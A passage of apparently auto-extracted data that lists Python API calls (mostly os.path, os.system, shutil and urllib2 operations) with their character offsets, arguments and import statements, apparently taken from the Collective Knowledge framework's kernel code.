55400), False, 'import site\n'), ((55722, 55741), 'os.path.realpath', 'os.path.realpath', (['s'], {}), '(s)\n', (55738, 55741), False, 'import os\n'), ((56206, 56222), 'os.path.isdir', 'os.path.isdir', (['x'], {}), '(x)\n', (56219, 56222), False, 'import os\n'), ((58310, 58354), 'os.path.join', 'os.path.join', (['home', "cfg['user_home_dir_ext']"], {}), "(home, cfg['user_home_dir_ext'])\n", (58322, 58354), False, 'import os\n'), ((58656, 58697), 'os.path.join', 'os.path.join', (['rps', "cfg['repo_name_local']"], {}), "(rps, cfg['repo_name_local'])\n", (58668, 58697), False, 'import os\n'), ((59478, 59497), 'os.path.realpath', 'os.path.realpath', (['s'], {}), '(s)\n', (59494, 59497), False, 'import os\n'), ((59533, 59623), 'os.path.join', 'os.path.join', (["work['dir_local_repo']", "cfg['module_repo_name']", "cfg['repo_name_local']"], {}), "(work['dir_local_repo'], cfg['module_repo_name'], cfg[\n 'repo_name_local'])\n", (59545, 59623), False, 'import os\n'), ((59651, 59709), 'os.path.join', 'os.path.join', (["work['dir_local_repo']", "cfg['subdir_kernel']"], {}), "(work['dir_local_repo'], cfg['subdir_kernel'])\n", (59663, 59709), False, 'import os\n'), ((59739, 59848), 'os.path.join', 'os.path.join', (["work['dir_local_kernel']", "work['local_kernel_uoa']", "cfg['subdir_ck_ext']", "cfg['file_meta']"], {}), "(work['dir_local_kernel'], work['local_kernel_uoa'], cfg[\n 'subdir_ck_ext'], cfg['file_meta'])\n", (59751, 59848), False, 'import os\n'), ((61730, 61767), 'os.path.isfile', 'os.path.isfile', (["work['dir_local_cfg']"], {}), "(work['dir_local_cfg'])\n", (61744, 61767), False, 'import os\n'), ((64677, 64691), 'os.listdir', 'os.listdir', (['po'], {}), '(po)\n', (64687, 64691), False, 'import os\n'), ((71220, 71254), 'os.path.join', 'os.path.join', (['new_path', '"""pack.zip"""'], {}), "(new_path, 'pack.zip')\n", (71232, 71254), False, 'import os\n'), ((71267, 71286), 'os.path.isfile', 'os.path.isfile', (['ppz'], {}), '(ppz)\n', (71281, 71286), False, 'import os\n'), ((71719, 71731), 'os.stat', 'os.stat', (['ppz'], {}), '(ppz)\n', (71726, 71731), False, 'import os\n'), ((72247, 72269), 'zipfile.ZipFile', 'zipfile.ZipFile', (['new_f'], {}), '(new_f)\n', (72262, 72269), False, 'import zipfile\n'), ((72905, 72919), 'os.remove', 'os.remove', (['ppz'], {}), '(ppz)\n', (72914, 72919), False, 'import os\n'), ((77967, 77986), 'os.path.normpath', 'os.path.normpath', (['p'], {}), '(p)\n', (77983, 77986), False, 'import os\n'), ((87995, 88060), 'os.path.join', 'os.path.join', (['pp', "cfg['subdir_ck_ext']", "(cfg['file_alias_u'] + uid)"], {}), "(pp, cfg['subdir_ck_ext'], cfg['file_alias_u'] + uid)\n", (88007, 88060), False, 'import os\n'), ((88096, 88114), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (88110, 88114), False, 'import os\n'), ((88819, 88839), 'os.path.join', 'os.path.join', (['p', 'uid'], {}), '(p, uid)\n', (88831, 88839), False, 'import os\n'), ((88850, 88867), 'os.path.isdir', 'os.path.isdir', (['p2'], {}), '(p2)\n', (88863, 88867), False, 'import os\n'), ((89105, 89125), 'os.path.join', 'os.path.join', (['p', 'sd1'], {}), '(p, sd1)\n', (89117, 89125), False, 'import os\n'), ((89356, 89423), 'os.path.join', 'os.path.join', (['pp', "cfg['subdir_ck_ext']", "(cfg['file_alias_a'] + alias)"], {}), "(pp, cfg['subdir_ck_ext'], cfg['file_alias_a'] + alias)\n", (89368, 89423), False, 'import os\n'), ((91096, 91114), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (91110, 91114), False, 'import os\n'), ((91126, 91185), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_meta_old']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_meta_old'])\n", (91138, 91185), False, 'import os\n'), ((91465, 91520), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_info']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_info'])\n", (91477, 91520), False, 'import os\n'), ((91531, 91549), 'os.path.isfile', 'os.path.isfile', (['p2'], {}), '(p2)\n', (91545, 91549), False, 'import os\n'), ((93382, 93405), 'imp.find_module', 'imp.find_module', (['n', '[p]'], {}), '(n, [p])\n', (93397, 93405), False, 'import imp\n'), ((94615, 94657), 'imp.load_module', 'imp.load_module', (['ruid', 'ff', 'full_path', 'x[2]'], {}), '(ruid, ff, full_path, x[2])\n', (94630, 94657), False, 'import imp\n'), ((97208, 97228), 'os.path.basename', 'os.path.basename', (['fn'], {}), '(fn)\n', (97224, 97228), False, 'import os\n'), ((97679, 97707), 'ssl.create_default_context', 'ssl.create_default_context', ([], {}), '()\n', (97705, 97707), False, 'import ssl\n'), ((98056, 98097), 'urllib2.HTTPPasswordMgrWithDefaultRealm', 'urllib2.HTTPPasswordMgrWithDefaultRealm', ([], {}), '()\n', (98095, 98097), False, 'import urllib2\n'), ((98697, 98721), 'urllib2.urlopen', 'urllib2.urlopen', (['request'], {}), '(request)\n', (98712, 98721), False, 'import urllib2\n'), ((111915, 111954), 'os.path.join', 'os.path.join', (['p1', "cfg['file_kernel_py']"], {}), "(p1, cfg['file_kernel_py'])\n", (111927, 111954), False, 'import os\n'), ((112072, 112100), 'os.path.join', 'os.path.join', (['p', '"""module.py"""'], {}), "(p, 'module.py')\n", (112084, 112100), False, 'import os\n'), ((119422, 119443), 'os.path.join', 'os.path.join', (['p0', 'sd1'], {}), '(p0, sd1)\n', (119434, 119443), False, 'import os\n'), ((119673, 119711), 'os.path.join', 'os.path.join', (['p0', "cfg['subdir_ck_ext']"], {}), "(p0, cfg['subdir_ck_ext'])\n", (119685, 119711), False, 'import os\n'), ((119972, 120017), 'os.path.join', 'os.path.join', (['p1', "(cfg['file_alias_a'] + alias)"], {}), "(p1, cfg['file_alias_a'] + alias)\n", (119984, 120017), False, 'import os\n'), ((120028, 120046), 'os.path.isfile', 'os.path.isfile', (['p3'], {}), '(p3)\n', (120042, 120046), False, 'import os\n'), ((120418, 120461), 'os.path.join', 'os.path.join', (['p1', "(cfg['file_alias_u'] + uid)"], {}), "(p1, cfg['file_alias_u'] + uid)\n", (120430, 120461), False, 'import os\n'), ((120472, 120490), 'os.path.isfile', 'os.path.isfile', (['p2'], {}), '(p2)\n', (120486, 120490), False, 'import os\n'), ((121206, 121223), 'os.path.exists', 'os.path.exists', (['p'], {}), '(p)\n', (121220, 121223), False, 'import os\n'), ((122358, 122374), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (122371, 122374), False, 'import os\n'), ((122386, 122423), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']"], {}), "(p, cfg['subdir_ck_ext'])\n", (122398, 122423), False, 'import os\n'), ((122473, 122493), 'os.path.join', 'os.path.join', (['p0', 'p9'], {}), '(p0, p9)\n', (122485, 122493), False, 'import os\n'), ((122578, 122596), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (122592, 122596), False, 'import os\n'), ((124604, 124642), 'shutil.rmtree', 'shutil.rmtree', (['p'], {'onerror': 'rm_read_only'}), '(p, onerror=rm_read_only)\n', (124617, 124642), False, 'import shutil\n'), ((131964, 132023), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_for_lock']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_for_lock'])\n", (131976, 132023), False, 'import os\n'), ((132050, 132068), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (132064, 132068), False, 'import os\n'), ((137305, 137316), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (137314, 137316), False, 'import os\n'), ((137422, 137455), 'os.path.join', 'os.path.join', (['p', "cfg['repo_file']"], {}), "(p, cfg['repo_file'])\n", (137434, 137455), False, 'import os\n'), ((137467, 137485), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (137481, 137485), False, 'import os\n'), ((137536, 137552), 'os.path.split', 'os.path.split', (['p'], {}), '(p)\n', (137549, 137552), False, 'import os\n'), ((141191, 141225), 'urllib2.urlopen', 'urllib2.urlopen', (["cfg['status_url']"], {}), "(cfg['status_url'])\n", (141206, 141225), False, 'import urllib2\n'), ((181879, 181890), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (181888, 181890), False, 'import os\n'), ((181899, 181911), 'os.chdir', 'os.chdir', (['pr'], {}), '(pr)\n', (181907, 181911), False, 'import os\n'), ((181922, 181957), 'os.path.isdir', 'os.path.isdir', (["cfg['subdir_ck_ext']"], {}), "(cfg['subdir_ck_ext'])\n", (181935, 181957), False, 'import os\n'), ((182108, 182120), 'os.chdir', 'os.chdir', (['p1'], {}), '(p1)\n', (182116, 182120), False, 'import os\n'), ((182131, 182166), 'os.path.isdir', 'os.path.isdir', (["cfg['subdir_ck_ext']"], {}), "(cfg['subdir_ck_ext'])\n", (182144, 182166), False, 'import os\n'), ((182414, 182427), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (182423, 182427), False, 'import os\n'), ((182436, 182449), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (182444, 182449), False, 'import os\n'), ((183435, 183495), 'os.path.join', 'os.path.join', (['p2', "cfg['subdir_ck_ext']", "cfg['file_for_lock']"], {}), "(p2, cfg['subdir_ck_ext'], cfg['file_for_lock'])\n", (183447, 183495), False, 'import os\n'), ((183506, 183524), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (183520, 183524), False, 'import os\n'), ((189567, 189580), 'os.remove', 'os.remove', (['fn'], {}), '(fn)\n', (189576, 189580), False, 'import os\n'), ((199002, 199047), 'os.path.join', 'os.path.join', (['p1', "(cfg['file_alias_u'] + nduid)"], {}), "(p1, cfg['file_alias_u'] + nduid)\n", (199014, 199047), False, 'import os\n'), ((199058, 199076), 'os.path.isfile', 'os.path.isfile', (['p2'], {}), '(p2)\n', (199072, 199076), False, 'import os\n'), ((199449, 199469), 'os.path.isdir', 'os.path.isdir', (['nduoa'], {}), '(nduoa)\n', (199462, 199469), False, 'import os\n'), ((200834, 200890), 'os.path.join', 'os.path.join', (['pn', "cfg['subdir_ck_ext']", "cfg['file_info']"], {}), "(pn, cfg['subdir_ck_ext'], cfg['file_info'])\n", (200846, 200890), False, 'import os\n'), ((201640, 201685), 'os.path.join', 'os.path.join', (['p1', "(cfg['file_alias_a'] + nduoa)"], {}), "(p1, cfg['file_alias_a'] + nduoa)\n", (201652, 201685), False, 'import os\n'), ((201831, 201876), 'os.path.join', 'os.path.join', (['p1', "(cfg['file_alias_u'] + nduid)"], {}), "(p1, cfg['file_alias_u'] + nduid)\n", (201843, 201876), False, 'import os\n'), ((207731, 207742), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (207740, 207742), False, 'import os\n'), ((207754, 207771), 'os.path.split', 'os.path.split', (['pn'], {}), '(pn)\n', (207767, 207771), False, 'import os\n'), ((207814, 207827), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (207822, 207827), False, 'import os\n'), ((207908, 207921), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (207917, 207921), False, 'import os\n'), ((207930, 207943), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (207938, 207943), False, 'import os\n'), ((210822, 210829), 'copy', 'copy', (['i'], {}), '(i)\n', (210826, 210829), False, 'import copy\n'), ((212883, 212902), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (212895, 212902), False, 'import os\n'), ((212928, 212965), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']"], {}), "(p, cfg['subdir_ck_ext'])\n", (212940, 212965), False, 'import os\n'), ((213387, 213398), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (213396, 213398), False, 'import os\n'), ((213406, 213419), 'os.chdir', 'os.chdir', (['px0'], {}), '(px0)\n', (213414, 213419), False, 'import os\n'), ((213500, 213513), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (213509, 213513), False, 'import os\n'), ((213549, 213562), 'os.remove', 'os.remove', (['p1'], {}), '(p1)\n', (213558, 213562), False, 'import os\n'), ((213618, 213657), 'shutil.rmtree', 'shutil.rmtree', (['p1'], {'onerror': 'rm_read_only'}), '(p1, onerror=rm_read_only)\n', (213631, 213657), False, 'import shutil\n'), ((213686, 213699), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (213694, 213699), False, 'import os\n'), ((236751, 236762), 'time.time', 'time.time', ([], {}), '()\n', (236760, 236762), False, 'import time\n'), ((245734, 245752), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (245748, 245752), False, 'import os\n'), ((245764, 245823), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_meta_old']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_meta_old'])\n", (245776, 245823), False, 'import os\n'), ((252705, 252760), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_meta']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_meta'])\n", (252717, 252760), False, 'import os\n'), ((254523, 254568), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".tmp"""', 'prefix': '"""ck-"""'}), "(suffix='.tmp', prefix='ck-')\n", (254539, 254568), False, 'import tempfile\n'), ((254576, 254589), 'os.close', 'os.close', (['fd1'], {}), '(fd1)\n', (254584, 254589), False, 'import os\n'), ((254597, 254611), 'os.remove', 'os.remove', (['fn1'], {}), '(fn1)\n', (254606, 254611), False, 'import os\n'), ((254629, 254674), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".tmp"""', 'prefix': '"""ck-"""'}), "(suffix='.tmp', prefix='ck-')\n", (254645, 254674), False, 'import tempfile\n'), ((254682, 254695), 'os.close', 'os.close', (['fd2'], {}), '(fd2)\n', (254690, 254695), False, 'import os\n'), ((254703, 254717), 'os.remove', 'os.remove', (['fn2'], {}), '(fn2)\n', (254712, 254717), False, 'import os\n'), ((254881, 254895), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (254890, 254895), False, 'import os\n'), ((255116, 255135), 'os.path.isfile', 'os.path.isfile', (['fn1'], {}), '(fn1)\n', (255130, 255135), False, 'import os\n'), ((255162, 255181), 'os.path.isfile', 'os.path.isfile', (['fn2'], {}), '(fn2)\n', (255176, 255181), False, 'import os\n'), ((263512, 263555), 'os.path.join', 'os.path.join', (['px', "pd['dummy_module_action']"], {}), "(px, pd['dummy_module_action'])\n", (263524, 263555), False, 'import os\n'), ((263733, 263779), 'os.path.join', 'os.path.join', (['pp', "cfg['module_full_code_name']"], {}), "(pp, cfg['module_full_code_name'])\n", (263745, 263779), False, 'import os\n'), ((271249, 271266), 'os.path.split', 'os.path.split', (['fn'], {}), '(fn)\n', (271262, 271266), False, 'import os\n'), ((271979, 271998), 'os.path.isfile', 'os.path.isfile', (['pfn'], {}), '(pfn)\n', (271993, 271998), False, 'import os\n'), ((275353, 275390), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']"], {}), "(p, cfg['subdir_ck_ext'])\n", (275365, 275390), False, 'import os\n'), ((275943, 275959), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (275956, 275959), False, 'import os\n'), ((275961, 275975), 'os.makedirs', 'os.makedirs', (['p'], {}), '(p)\n', (275972, 275975), False, 'import os\n'), ((276064, 276083), 'os.path.join', 'os.path.join', (['p', 'fn'], {}), '(p, fn)\n', (276076, 276083), False, 'import os\n'), ((276305, 276323), 'os.path.isfile', 'os.path.isfile', (['p3'], {}), '(p3)\n', (276319, 276323), False, 'import os\n'), ((276666, 276689), 'shutil.copyfile', 'shutil.copyfile', (['fn', 'p3'], {}), '(fn, p3)\n', (276681, 276689), False, 'import shutil\n'), ((277021, 277032), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (277030, 277032), False, 'import os\n'), ((277044, 277060), 'os.path.split', 'os.path.split', (['p'], {}), '(p)\n', (277057, 277060), False, 'import os\n'), ((277103, 277116), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (277111, 277116), False, 'import os\n'), ((277198, 277211), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (277207, 277211), False, 'import os\n'), ((277220, 277233), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (277228, 277233), False, 'import os\n'), ((278139, 278150), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (278148, 278150), False, 'import os\n'), ((278971, 278984), 'os.remove', 'os.remove', (['p3'], {}), '(p3)\n', (278980, 278984), False, 'import os\n'), ((17124, 17140), 'json.dumps', 'json.dumps', (['i[k]'], {}), '(i[k])\n', (17134, 17140), False, 'import json\n'), ((18162, 18181), 'sys.stderr.write', 'sys.stderr.write', (['b'], {}), '(b)\n', (18178, 18181), False, 'import sys\n'), ((22840, 22859), 'psutil.Process', 'psutil.Process', (['pid'], {}), '(pid)\n', (22854, 22859), False, 'import psutil\n'), ((24150, 24165), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (24160, 24165), False, 'import time\n'), ((25460, 25476), 'shlex.split', 'shlex.split', (['cmd'], {}), '(cmd)\n', (25471, 25476), False, 'import shlex\n'), ((27633, 27683), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m-%dT%H:%M:%S"""'], {}), "(t, '%Y-%m-%dT%H:%M:%S')\n", (27659, 27683), False, 'import datetime\n'), ((27796, 27843), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m-%dT%H:%M"""'], {}), "(t, '%Y-%m-%dT%H:%M')\n", (27822, 27843), False, 'import datetime\n'), ((27956, 28000), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m-%dT%H"""'], {}), "(t, '%Y-%m-%dT%H')\n", (27982, 28000), False, 'import datetime\n'), ((28113, 28154), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m-%d"""'], {}), "(t, '%Y-%m-%d')\n", (28139, 28154), False, 'import datetime\n'), ((28267, 28305), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m"""'], {}), "(t, '%Y-%m')\n", (28293, 28305), False, 'import datetime\n'), ((28418, 28453), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y"""'], {}), "(t, '%Y')\n", (28444, 28453), False, 'import datetime\n'), ((37734, 37754), 'struct.calcsize', 'struct.calcsize', (['"""P"""'], {}), "('P')\n", (37749, 37754), False, 'import struct\n'), ((38409, 38423), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (38418, 38423), False, 'import os\n'), ((39260, 39272), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (39270, 39272), False, 'import uuid\n'), ((46135, 46162), 'base64.urlsafe_b64encode', 'base64.urlsafe_b64encode', (['s'], {}), '(s)\n', (46159, 46162), False, 'import base64\n'), ((55416, 55479), 'os.path.join', 'os.path.join', (['px', "cfg['kernel_dir']", "cfg['subdir_default_repo']"], {}), "(px, cfg['kernel_dir'], cfg['subdir_default_repo'])\n", (55428, 55479), False, 'import os\n'), ((55531, 55548), 'os.path.isdir', 'os.path.isdir', (['py'], {}), '(py)\n', (55544, 55548), False, 'import os\n'), ((55637, 55676), 'os.environ.get', 'os.environ.get', (["cfg['env_key_root']", '""""""'], {}), "(cfg['env_key_root'], '')\n", (55651, 55676), False, 'import os\n'), ((55832, 55894), 'os.path.join', 'os.path.join', (["work['env_root']", 'px', "cfg['subdir_default_repo']"], {}), "(work['env_root'], px, cfg['subdir_default_repo'])\n", (55844, 55894), False, 'import os\n'), ((55909, 55926), 'os.path.isdir', 'os.path.isdir', (['py'], {}), '(py)\n', (55922, 55926), False, 'import os\n'), ((56133, 56180), 'os.environ.get', 'os.environ.get', (["cfg['env_key_default_repo']", '""""""'], {}), "(cfg['env_key_default_repo'], '')\n", (56147, 56180), False, 'import os\n'), ((56356, 56422), 'os.path.join', 'os.path.join', (['home', '""".ck"""', '__version__', "cfg['subdir_default_repo']"], {}), "(home, '.ck', __version__, cfg['subdir_default_repo'])\n", (56368, 56422), False, 'import os\n'), ((57971, 58011), 'os.environ.get', 'os.environ.get', (["cfg['env_key_repos']", '""""""'], {}), "(cfg['env_key_repos'], '')\n", (57985, 58011), False, 'import os\n'), ((58369, 58387), 'os.path.isdir', 'os.path.isdir', (['rps'], {}), '(rps)\n', (58382, 58387), False, 'import os\n'), ((58399, 58415), 'os.makedirs', 'os.makedirs', (['rps'], {}), '(rps)\n', (58410, 58415), False, 'import os\n'), ((58538, 58583), 'os.environ.get', 'os.environ.get', (["cfg['env_key_local_repo']", '""""""'], {}), "(cfg['env_key_local_repo'], '')\n", (58552, 58583), False, 'import os\n'), ((58712, 58728), 'os.path.isdir', 'os.path.isdir', (['s'], {}), '(s)\n', (58725, 58728), False, 'import os\n'), ((58740, 58754), 'os.makedirs', 'os.makedirs', (['s'], {}), '(s)\n', (58751, 58754), False, 'import os\n'), ((60990, 61032), 'os.path.isfile', 'os.path.isfile', (["work['dir_cache_repo_uoa']"], {}), "(work['dir_cache_repo_uoa'])\n", (61004, 61032), False, 'import os\n'), ((61041, 61084), 'os.path.isfile', 'os.path.isfile', (["work['dir_cache_repo_info']"], {}), "(work['dir_cache_repo_info'])\n", (61055, 61084), False, 'import os\n'), ((64783, 64803), 'os.path.join', 'os.path.join', (['po', 'fn'], {}), '(po, fn)\n', (64795, 64803), False, 'import os\n'), ((71299, 71313), 'os.remove', 'os.remove', (['ppz'], {}), '(ppz)\n', (71308, 71313), False, 'import os\n'), ((71567, 71593), 'urllib.urlretrieve', 'urlretrieve', (['file_url', 'ppz'], {}), '(file_url, ppz)\n', (71578, 71593), False, 'from urllib import urlretrieve\n'), ((88545, 88567), 'os.path.join', 'os.path.join', (['p', 'alias'], {}), '(p, alias)\n', (88557, 88567), False, 'import os\n'), ((88788, 88808), 'os.path.join', 'os.path.join', (['p', 'sd1'], {}), '(p, sd1)\n', (88800, 88808), False, 'import os\n'), ((91228, 91246), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (91242, 91246), False, 'import os\n'), ((91757, 91815), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_updates']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_updates'])\n", (91769, 91815), False, 'import os\n'), ((91829, 91847), 'os.path.isfile', 'os.path.isfile', (['p3'], {}), '(p3)\n', (91843, 91847), False, 'import os\n'), ((92070, 92125), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_desc']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_desc'])\n", (92082, 92125), False, 'import os\n'), ((92139, 92157), 'os.path.isfile', 'os.path.isfile', (['p4'], {}), '(p4)\n', (92153, 92157), False, 'import os\n'), ((93751, 93778), 'os.path.getmtime', 'os.path.getmtime', (['full_path'], {}), '(full_path)\n', (93767, 93778), False, 'import os\n'), ((96908, 96926), 'os.path.isfile', 'os.path.isfile', (['fn'], {}), '(fn)\n', (96922, 96926), False, 'import os\n'), ((111863, 111904), 'os.path.dirname', 'os.path.dirname', (["work['dir_default_repo']"], {}), "(work['dir_default_repo'])\n", (111878, 111904), False, 'import os\n'), ((111970, 111987), 'os.path.isfile', 'os.path.isfile', (['p'], {}), '(p)\n', (111984, 111987), False, 'import os\n'), ((119503, 119521), 'os.path.isdir', 'os.path.isdir', (['p00'], {}), '(p00)\n', (119516, 119521), False, 'import os\n'), ((119533, 119546), 'os.mkdir', 'os.mkdir', (['p00'], {}), '(p00)\n', (119541, 119546), False, 'import os\n'), ((119726, 119743), 'os.path.isdir', 'os.path.isdir', (['p1'], {}), '(p1)\n', (119739, 119743), False, 'import os\n'), ((121247, 121258), 'os.mkdir', 'os.mkdir', (['p'], {}), '(p)\n', (121255, 121258), False, 'import os\n'), ((122532, 122543), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (122541, 122543), False, 'import os\n'), ((122554, 122566), 'os.chdir', 'os.chdir', (['p0'], {}), '(p0)\n', (122562, 122566), False, 'import os\n'), ((122894, 122912), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (122908, 122912), False, 'import os\n'), ((123038, 123058), 'os.path.join', 'os.path.join', (['p0', 'p9'], {}), '(p0, p9)\n', (123050, 123058), False, 'import os\n'), ((123072, 123090), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (123086, 123090), False, 'import os\n'), ((124003, 124016), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (124011, 124016), False, 'import os\n'), ((133367, 133380), 'os.remove', 'os.remove', (['pl'], {}), '(pl)\n', (133376, 133380), False, 'import os\n'), ((135081, 135092), 'time.time', 'time.time', ([], {}), '()\n', (135090, 135092), False, 'import time\n'), ((138723, 138741), 'os.path.join', 'os.path.join', (['p', 'm'], {}), '(p, m)\n', (138735, 138741), False, 'import os\n'), ((166865, 166881), 'copy.deepcopy', 'copy.deepcopy', (['i'], {}), '(i)\n', (166878, 166881), False, 'import copy\n'), ((170021, 170083), 'subprocess.Popen', 'subprocess.Popen', (["['cmd', '/k', s]"], {'shell': '(True)', 'env': 'os.environ'}), "(['cmd', '/k', s], shell=True, env=os.environ)\n", (170037, 170083), False, 'import subprocess\n'), ((170326, 170358), 'os.system', 'os.system', (["('bash --rcfile ' + fn)"], {}), "('bash --rcfile ' + fn)\n", (170335, 170358), False, 'import os\n'), ((178872, 178889), 'os.path.isdir', 'os.path.isdir', (['p3'], {}), '(p3)\n', (178885, 178889), False, 'import os\n'), ((182086, 182099), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (182095, 182099), False, 'import os\n'), ((182295, 182308), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (182304, 182308), False, 'import os\n'), ((183526, 183539), 'os.remove', 'os.remove', (['pl'], {}), '(pl)\n', (183535, 183539), False, 'import os\n'), ((192168, 192184), 'os.path.split', 'os.path.split', (['p'], {}), '(p)\n', (192181, 192184), False, 'import os\n'), ((192517, 192572), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_info']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_info'])\n", (192529, 192572), False, 'import os\n'), ((192587, 192605), 'os.path.isfile', 'os.path.isfile', (['p2'], {}), '(p2)\n', (192601, 192605), False, 'import os\n'), ((194404, 194420), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (194417, 194420), False, 'import os\n'), ((200021, 200045), 'os.path.join', 'os.path.join', (['pm1', 'nduoa'], {}), '(pm1, nduoa)\n', (200033, 200045), False, 'import os\n'), ((200072, 200095), 'os.path.join', 'os.path.join', (['pm', 'nduoa'], {}), '(pm, nduoa)\n', (200084, 200095), False, 'import os\n'), ((200172, 200194), 'shutil.copytree', 'shutil.copytree', (['p', 'pn'], {}), '(p, pn)\n', (200187, 200194), False, 'import shutil\n'), ((200209, 200220), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (200218, 200220), False, 'import os\n'), ((200235, 200252), 'os.path.split', 'os.path.split', (['pn'], {}), '(pn)\n', (200248, 200252), False, 'import os\n'), ((200304, 200317), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (200312, 200317), False, 'import os\n'), ((200404, 200417), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (200413, 200417), False, 'import os\n'), ((200432, 200448), 'os.path.split', 'os.path.split', (['p'], {}), '(p)\n', (200445, 200448), False, 'import os\n'), ((200575, 200588), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (200584, 200588), False, 'import os\n'), ((200600, 200613), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (200608, 200613), False, 'import os\n'), ((200628, 200644), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (200641, 200644), False, 'import os\n'), ((200722, 200738), 'os.rename', 'os.rename', (['p', 'pn'], {}), '(p, pn)\n', (200731, 200738), False, 'import os\n'), ((201418, 201435), 'os.path.isdir', 'os.path.isdir', (['p1'], {}), '(p1)\n', (201431, 201435), False, 'import os\n'), ((202033, 202044), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (202042, 202044), False, 'import os\n'), ((202059, 202076), 'os.path.split', 'os.path.split', (['p1'], {}), '(p1)\n', (202072, 202076), False, 'import os\n'), ((202128, 202141), 'os.chdir', 'os.chdir', (['pp0'], {}), '(pp0)\n', (202136, 202141), False, 'import os\n'), ((202228, 202241), 'os.system', 'os.system', (['ss'], {}), '(ss)\n', (202237, 202241), False, 'import os\n'), ((202253, 202266), 'os.chdir', 'os.chdir', (['ppp'], {}), '(ppp)\n', (202261, 202266), False, 'import os\n'), ((207476, 207494), 'os.path.join', 'os.path.join', (['p', 'q'], {}), '(p, q)\n', (207488, 207494), False, 'import os\n'), ((207509, 207528), 'os.path.join', 'os.path.join', (['pn', 'q'], {}), '(pn, q)\n', (207521, 207528), False, 'import os\n'), ((207572, 207592), 'os.path.dirname', 'os.path.dirname', (['pn1'], {}), '(pn1)\n', (207587, 207592), False, 'import os\n'), ((207662, 207682), 'shutil.copy', 'shutil.copy', (['p1', 'pn1'], {}), '(p1, pn1)\n', (207673, 207682), False, 'import shutil\n'), ((213186, 213204), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (213200, 213204), False, 'import os\n'), ((213213, 213230), 'os.path.isdir', 'os.path.isdir', (['p1'], {}), '(p1)\n', (213226, 213230), False, 